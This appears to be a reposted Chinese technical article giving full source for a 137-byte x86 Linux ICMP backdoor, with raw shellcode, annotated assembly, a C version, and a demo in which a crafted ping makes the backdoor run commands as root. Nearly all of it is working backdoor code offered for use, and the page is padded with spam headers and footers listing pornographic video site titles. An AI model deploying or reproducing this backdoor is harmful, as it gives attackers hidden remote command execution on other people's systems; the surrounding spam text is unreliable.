成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Linux ICMP后門代碼

網(wǎng)絡(luò) 網(wǎng)絡(luò)管理
下面我們來對Linux Icmp后門的相關(guān)內(nèi)容進(jìn)行一下介紹。文中介紹了具體的代碼,希望對大家有所幫助。

在不少協(xié)議的應(yīng)用都存在著一些后門。例如我們今天將要介紹的Linux ICMP的后門。那么下面我們就來詳細(xì)看一下關(guān)于137字節(jié)的Linux遠(yuǎn)程ICMP后門的具體內(nèi)容。使用Ping控制程序:

  /*
  x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
  
  [example]
  
  main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
  Size of shellcode = 137
  
  main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
  PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
  34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
  main:/home/gloomy/security/shellcode/linux/icmp# cat out
  uid=0(root) gid=0(root) groups=0(root)
  main:/home/gloomy/security/shellcode/linux/icmp#
  
  */
  
  #include <stdio.h>
  #include <unistd.h>
  #include <sys/socket.h>
  #include <netinet/in.h>
  
  #define SECRET_CHAR "\x99"
  
  char shell[] =
  "\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
  "\x43\x41\x51\xb1\x03\x51\x49\x51"
  "\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
  "\xcd\x80\x31\xdb\x39\xc3\x75\x55"
  "\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
  "\xff\x54\x54\x53\x50\x55\x52\x89"
  "\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
  "\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
  "\xb0\x25\x01\xc5\xb0" SECRET_CHAR
  "\x32\x45\xff\x75\xd5\xb0\x02\xcd"
  "\x80\x31\xdb\x39\xc3\x74\x25\xeb"
  "\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
  "\x06\xcd\x80\x5b\x89\xd9\x88\x43"
  "\x07\x80\xc1\x08\x50\x55\x51\x53"
  "\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
  "\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
  "\xff"
  "/bin/sh -c";
  
  void asm_code() {
  __asm("
  xorl %eax,%eax
  xorl %ebx,%ebx
  xorl %ecx,%ecx
  movb $0x66,%al
  incl %ebx
  incl %ecx
  push %ecx
  movb $0x3,%cl
  push %ecx
  decl %ecx
  push %ecx
  movl %esp,%ecx
  int $0x80 /* socket(); */
  movl %eax,%edx
  
  movb $0x2,%al
  int $0x80 /* fork(); */
  xorl %ebx,%ebx
  cmpl %eax,%ebx
  jne exit
  
  endlessloop:
  xorl %eax,%eax
  xorl %ebx,%ebx
  movb $0x10,%al
  push %eax
  movb $0xff,%al
  push %esp
  push %esp
  push %ebx
  push %eax
  push %ebp
  push %edx
  movl %esp,%ecx
  movb $0x66,%al
  movb $0x0c,%bl
  int $0x80 /* recvfrom(); */
  
  movl %ebp,%ecx
  addl %eax,%ecx
  xorl %eax,%eax
  movb %al,-2(%ecx)
  movb $0x25,%al
  addl %eax,%ebp
  movb $0x99,%al /* SECRET_CHAR */
  xorb -1(%ebp),%al
  jnz endlessloop
  
  movb $0x2,%al
  int $0x80 /* fork(); */
  xorl %ebx,%ebx
  cmpl %eax,%ebx
  je stack
  jmp endlessloop
  execve:
  xorl %eax,%eax
  xorl %ebx,%ebx
  movb $0x2,%bl
  movb $0x6,%al
  int $0x80 /* close(); */
  
  pop %ebx
  movl %ebx,%ecx
  movb %al,0x7(%ebx)
  addb $0x8,%cl
  push %eax
  push %ebp
  push %ecx
  push %ebx
  movl %esp,%ecx
  cdq
  movb $0xb,%al
  int $0x80 /* execve(); */
  exit:
  xorl %eax,%eax
  incl %eax
  int $0x80 /* exit(); */
  stack:
  call execve
  .string \"/bin/sh -c\"
  
  ");
  }
  
  void c_code() {
  int fd;
  int nb = 0;
  struct sockaddr_in them;
  int them_size = sizeof(struct sockaddr);
  char buf[256];
  char *prog[] = {"/bin/sh","-c",&buf[37],NULL};
  
  fd = socket(2,3,1);
  if (fork() > 0) exit(0);
  while (1) {
  while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
  buf[nb-1] = 0;
  if (buf[36] == (char)SECRET_CHAR)
  if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
  }
  }
  
  int main(int c,char *v[]) {
  void (*i)();
  i = (void (*)())shell;
  fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell));
  i();
  return 0;

那么,具體的Linux ICMP后門查看方法我們就呈現(xiàn)出來了。

責(zé)任編輯:佟健 來源: csdn.net
相關(guān)推薦

2010-08-26 11:15:47

LinuxICMP后門

2010-08-31 10:00:55

LinuxICMP

2010-03-10 10:24:16

Linux ssh后門

2010-07-30 16:10:57

ICMPping

2010-08-02 15:21:06

DelphiICMP

2010-08-02 14:29:46

LinuxPingICMP

2014-03-06 17:52:25

2010-07-13 10:38:54

2010-09-13 14:47:58

2010-09-13 15:06:36

2016-02-25 11:02:11

2010-01-15 10:32:40

2024-04-03 14:28:12

2010-01-14 20:57:59

2010-09-13 14:57:29

2010-09-13 15:14:03

2013-04-12 11:07:01

2021-05-06 14:46:18

LinuxIcmpudp

2010-08-02 16:43:46

ICMP協(xié)議

2019-09-10 09:12:54

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: av毛片在线播放 | 中文字幕亚洲欧美日韩在线不卡 | 蜜桃臀av一区二区三区 | 精品免费国产一区二区三区四区 | 日韩有码在线播放 | 蜜桃视频麻豆 | 久久国产精品偷 | 性高湖久久久久久久久3小时 | 欧美区日韩区 | 日韩福利在线 | 999免费网站 | 免费观看www | 国产成人综合一区二区三区 | 久久99精品久久久久久狂牛 | 国产片侵犯亲女视频播放 | 99国内精品| 亚洲a一区二区 | 久久国产精品久久久久久 | 99亚洲| 2021天天干夜夜爽 | 一区二区视频在线观看 | 日韩av免费看 | h视频在线免费 | 国产精品成人一区二区三区夜夜夜 | 日韩视频一区二区在线 | 欧美成人精品一区二区男人看 | 久在线| 国产午夜精品一区二区三区四区 | 国产欧美精品一区二区三区 | 亚洲欧美中文日韩在线v日本 | 成人超碰在线 | 在线亚洲人成电影网站色www | 成人精品在线观看 | 亚洲精品www久久久久久广东 | 美女日批免费视频 | 久久国产成人 | 亚洲色欧美另类 | 中文字幕日韩一区 | 国内精品视频在线观看 | 精品少妇一区二区三区日产乱码 | 欧美精品一区三区 |